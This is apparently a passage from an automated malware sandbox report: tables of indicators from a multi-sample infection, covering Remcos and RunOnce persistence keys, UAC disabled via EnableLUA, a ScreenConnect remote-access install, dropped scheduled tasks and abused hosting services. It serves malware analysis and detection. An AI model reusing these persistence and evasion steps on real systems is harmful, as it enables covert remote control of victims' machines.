| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Google\Chrome\updater.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\ARP.EXE | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\System32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\System32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\System32\powercfg.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Boot or Logon Autostart Execution: Authentication Package
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800630031003300360030003600660065003900300030003900660031003100640029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | C:\Windows\system32\msiexec.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\Files\xdd.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe | N/A |
| N/A | N/A | C:\ProgramData\Google\Chrome\updater.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsFileManager.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsFileManager.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\app.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\Client.Override.en-US.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.Core.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsAuthenticationPackage.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsBackstageShell.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\Client.Override.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\ZZWJ0PS30NZECMN1L7UMRQE.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\web.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.Client.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.Windows.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsCredentialProvider.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsBackstageShell.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.WindowsClient.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\Client.en-US.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\Client.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\system.config | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\e5f0299.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9BE.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\CameroonBuses | C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe | N/A |
| File opened for modification | C:\Windows\BackedIma | C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe | N/A |
| File created | C:\Windows\Installer\{80530F48-9896-FE66-A2AB-CD9170769313}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\PossessDescriptions | C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\2863614952.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5f029b.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | \??\c:\windows\resources\themes\explorer.exe | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe | N/A |
| File created | C:\Windows\Tasks\Hkbsse.job | C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID69.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\ConsolidationDistinct | C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe | N/A |
| File created | C:\Windows\Installer\e5f0299.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6CF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\FlickrRealm | C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe | N/A |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\ednfosi.job | C:\Users\Admin\AppData\Local\Temp\Files\armadegon.exe | N/A |
| File opened for modification | C:\Windows\Resources\Themes\icsys.icn.exe | C:\Users\Admin\AppData\Local\Temp\Files\injector.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{80530F48-9896-FE66-A2AB-CD9170769313} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{80530F48-9896-FE66-A2AB-CD9170769313}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\3188116601.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\3188116601.exe | N/A |
| File opened for modification | C:\Windows\Installer\{80530F48-9896-FE66-A2AB-CD9170769313}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | \??\c:\windows\resources\spoolsv.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | \??\c:\windows\resources\svchost.exe | \??\c:\windows\resources\spoolsv.exe | N/A |
Launches sc.exe
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Embeds OpenSSL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1487620755.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\axaso\bkujn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1094014616.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\kxfh9qhs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\%E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\szo0xbx8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\q1wnx5ir.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3188116601.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\s.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (c13606fe9009f11d)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\ConsiderableWinners.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\ATLEQQXO.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\MYNEWRDX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\864131738.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\pfntjejghjsdkr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\69c36458f5\ednfosi.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
System Network Connections Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
